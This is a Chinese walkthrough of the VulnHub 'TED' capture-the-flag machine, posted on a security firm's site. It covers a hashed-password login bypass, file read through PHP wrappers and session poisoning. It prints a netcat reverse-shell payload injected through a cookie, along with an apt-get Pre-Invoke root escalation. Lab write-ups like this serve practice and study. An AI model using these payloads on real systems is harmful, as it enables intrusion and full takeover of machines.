vulnhub-TED靶场过程记录_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

vulnhub-TED靶场过程记录

发布日期:2024-05-24 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


vulnhub-TED靶场过程记录

靶场地址:https://download.vulnhub.com/ted/Ted.7z 靶场设置 使用VM打开 扫描靶场网段,得到ip地址 访问网址是个登陆框 扫描目录无果后,开始对登录框进行探索。 随便输入个密码后,发现密码或者密码hash错误,尝试多样的密码对比图如下 看来密码是admin没错了,然后应该是hash加密后访问。 这里耗尽了大量的时间,得出来了结果(还是朋友做出来的,难受) 这里使用的是sha256加密,然后加密的字符串,字符转换大写 在在线网站进行大小写转换 一发入魂 获得下一步提示 在search存在任意文件读取 阅览cookie.php发现回显了文件 这里有一个authenticate.php 正常读取会出现退出登陆的情况,使用php伪协议读取到了文件 源码如下 同样的方式读取home Home文件中有这么一句话 $_SESSION['user_pref'] = $_COOKIE['user_pref']; 任意文件读取到sessions目录 第一种 写入一句话木马 链接蚁剑 但是上传不了脚本 一时间不知道咋弄了 第二种 %3C?php%20exec('nc%20192.168.17.128 %202222%20-e%20/bin/bash')%20?%3E  反弹nc 回到sessions哪里,因为有nc 对shell进行升级 SHELL=/bin/bash script -q /dev/null 然后卡壳,最终解决如下 记录如下 输入 sudo apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i" 提权

vulnhub-TED靶场过程记录